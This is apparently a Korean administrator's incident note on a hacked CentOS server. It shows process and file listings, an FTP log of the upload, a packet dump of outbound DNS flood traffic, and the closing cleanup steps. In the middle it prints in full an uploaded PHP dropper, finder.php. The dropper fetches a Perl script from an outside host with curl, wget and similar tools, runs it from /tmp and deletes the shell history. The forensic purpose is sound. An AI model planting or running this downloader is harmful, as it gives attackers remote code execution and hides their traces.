

[CentOS] 해킹점검 - perl


#pstree -ap

 구동중인 perl 스크립트 확인

|-perl,5675
|-perl,5686
|-perl,5701
|-perl,5708
|-perl,29091
|-perl,31046


lsof -p 5675

perl 5675 nobody mem REG 8,7 18080 544057 /usr/lib64/perl5/5.8.8/x86_64-linux-thread-multi/auto/IO/IO.so
perl 5675 nobody mem REG 8,7 21424 544232 /usr/lib64/perl5/5.8.8/x86_64-linux-thread-multi/auto/Socket/Socket.so


>> /var/log/xferlog 5월8일 15:48분 shinsxxxfnv 계정으로 finder.php 업로드 확인 (아래 로그에서 파일명 뒤의 "a"는 파일명의 일부가 아니라 xferlog 의 전송 유형(ASCII) 필드임)

Sun May 8 15:48:47 2016 2 172.93.98.2 4762 /public_html/finder.php a _ i r shinseonfnv ftp 0 * c




>> 최초 트래픽 유출시 덤프 요약

16:12:31.380091 IP 115.xxx.5.250.33708 > 172.93.98.3.53: [|domain]

16:12:31.380121 IP 115.xxx.5.250.33708 > 172.93.98.3.53: [|domain]

16:12:31.380147 IP 115.xxx.5.250.33708 > 172.93.98.3.53: [|domain]
16:12:31.380171 IP 115.xxx.5.250.33708 > 172.93.98.3.53: [|domain]
16:12:31.380196 IP 115.xxx.5.250.33708 > 172.93.98.3.53: [|domain]
16:12:31.380222 IP 115.xxx.5.250.33708 > 172.93.98.3.53: [|domain]
16:12:31.380247 IP 115.xxx.5.250.33708 > 172.93.98.3.53: [|domain]
16:12:31.380273 IP 115.xxx.5.250.33708 > 172.93.98.3.53: [|domain]


업로드된 finder.php 내용 (원격 서버에서 read.txt 를 받아 /tmp 에서 perl 로 실행하는 다운로더/드로퍼 원문)

<?
$url='http://y.cyberunder.org/';
exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
exec('cd /tmp;GET '.$url.'read.txt > read.txt;perl read.txt;rm -f read.txt*;');
exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
passthru('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
passthru('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
passthru('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
passthru('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
passthru('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
system('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
system('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
system('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
system('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
system('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
shell_exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
shell_exec('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
shell_exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
shell_exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
shell_exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
popen('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', 'r');
popen('cd /tmp;curl -O '.$url.'read.txt; perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', 'r');
popen('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', 'r');
popen('cd /tmp;lynx -source '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', 'r');
popen('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', 'r');
popen('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', 'r');
@exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@exec('cd /tmp;GET '.$url.'read.txt > read.txt;perl read.txt;rm -f read.txt*;');
@exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
@exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@passthru('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@passthru('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@passthru('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
@passthru('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@passthru('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@system('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@system('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@system('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@system('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
@system('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');
@shell_exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');
@popen('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', 'r');
@popen('cd /tmp;curl -O '.$url.'read.txt; perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', 'r');
@popen('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', 'r');
@popen('cd /tmp;lynx -source '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', 'r');
@popen('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', 'r');
@popen('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', 'r');
?>



>>  shinsxxxfnv 계정 패스워드 변경 & 삭제 

>>public_html/finder.php a 파일 격리조치